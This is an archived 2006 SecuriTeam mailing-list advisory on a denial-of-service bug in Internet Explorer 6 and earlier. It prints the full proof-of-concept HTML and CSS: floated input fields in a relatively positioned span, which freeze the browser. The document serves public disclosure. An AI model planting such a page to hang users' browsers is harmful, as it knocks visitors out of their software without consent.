[EXPL] Internet Explorer input DoS (Exploit)
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 16 Jul 2006 12:56:38 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Internet Explorer input DoS (Exploit)
------------------------------------------------------------------------
SUMMARY
Improper handling of input field allows attackers to DoS Microsoft
Internet Explorer.
DETAILS
Exploit:
<!--
# Internet Explorer <= 6 DoS vulnerability
#
# tested IE6 on XPx64 and IE 5.1, 5.5 and 6 on XP SP2 (eng)
# all versions are vulnerable
# ie 7 (beta 2 and 3) are not affected
#
# this malicious css code freezes/ dos the internet explorer
# prior version 7 and stops any user interaction
# the absolute size of the div element does not matter but has
# to be higher than the input's one
#
# 07/14/2006 by jonasschaub at gmail.com
# http://jonas.elunic.de/blog/index.php/2006/07/14/ie-freeze-bug/
#
-->
<style type="text/css">
input
{
width:35px;
float:left;
}
</style>
<div style="width:50px;">
<span>
<span style="position:relative;">
<input />
</span>
<input />
<input />
</span>
</div>
ADDITIONAL INFORMATION
The information has been provided by <mailto:jonasschaub@xxxxxxxxx> Jona
Sschaub.
The original article can be found at:
<http://jonas.elunic.de/blog/index.php/2006/07/14/ie-freeze-bug/>
http://jonas.elunic.de/blog/index.php/2006/07/14/ie-freeze-bug/
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Prev by Date: [EXPL] Linux Kernel 2.6.x PRCTL Core Dump Handling (Exploit 2)
- Next by Date: [NEWS] Cisco Router Web Setup Ships with Insecure Default IOS Configuration
- Previous by thread: [EXPL] Linux Kernel 2.6.x PRCTL Core Dump Handling (Exploit 2)
- Next by thread: [NEWS] Cisco Router Web Setup Ships with Insecure Default IOS Configuration
- Index(es):
Relevant Pages
|
|